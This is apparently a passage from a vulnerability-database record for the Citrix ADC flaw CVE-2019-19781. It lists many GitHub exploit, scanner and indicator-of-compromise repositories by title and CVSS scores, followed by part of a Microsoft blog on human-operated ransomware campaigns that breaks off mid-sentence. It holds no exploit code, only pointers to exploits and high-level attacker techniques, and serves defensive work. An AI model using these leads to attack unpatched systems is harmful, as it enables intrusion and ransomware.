"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T00:26:16", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-06-16T11:16:06", "id": "46FA259E-5429-580C-B1D5-D1F09EB90023", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-06T19:18:05", "description": "# Citrix Unauthorized Remote Code Execution Attacker - CVE-2019-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-17T11:52:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-06T16:40:34", "id": "62ED9EA6-B108-5F5A-B611-70CC6C705459", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:17", "description": "# Shitrix-CVE-2019-19781\nMy working approach t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-12T18:53:29", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-21T15:54:44", "id": "2849E613-8689-58E7-9C55-A0616B66C91A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:35:12", "description": "# CVE-2019-19781\r\nAutomated script for Citrix ADC scanner ([CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-27T15:09:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-12-13T12:56:50", "id": "F27B127B-57F0-5352-B92F-B6F921378CBB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:35:48", "description": "# Remote Code Execution Exploit (CVE-2019-19781)- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T05:17:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T05:17:29", "id": "0829A67E-3C24-5D54-B681-A7F72848F524", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:32", "description": "# CVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T14:26:02", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T14:30:49", "id": "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-16T08:55:18", "description": "# CVE-2019-19781\n\nRemote Code Execution (RCE) in Citrix Applicat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T09:49:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-08-16T08:03:32", "id": "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:41:05", "description": "# Ctirix_RCE-CVE-2019-19781\nCitrix ADC RCE cve-2019-19781\n\n### [...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-29T05:22:47", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-12-06T19:08:34", "id": "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-02T11:58:22", "description": "# Indicator of Compromise Scanner for CVE-2019-19781\n\nThis repos...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-21T15:20:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-02T08:18:59", "id": "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:53:52", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-21T23:13:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-20T11:41:58", "id": "1AB95B23-4916-5338-9CB0-28672888287F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-06T06:34:39", "description": "# CVE-2019-19781\n\nSimple POC to test if your Citrix ADC Netscale...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-30T17:37:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-06T03:45:44", "id": "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:24", "description": "# Remote Code Execution Exploit (CVE-2019-19781)- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T20:43:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-19T06:52:48", "id": "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:27:24", "description": "# Citrix Analysis Notebook\n\nA jupyter notebook to aid in automat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T04:59:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-02-21T02:51:51", "id": "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:27:58", "description": "- [CVE-2019-19781 DFIR notes](https://github.com/x1sec/CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-12T23:13:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-10-27T02:49:53", "id": "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:40:41", "description": "# CVE-2019-19781-exploit\nCVE-201...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-27T02:23:02", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-07T17:52:31", "id": "09DFDAA9-9EF6-513F-B464-D707B45D598A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used 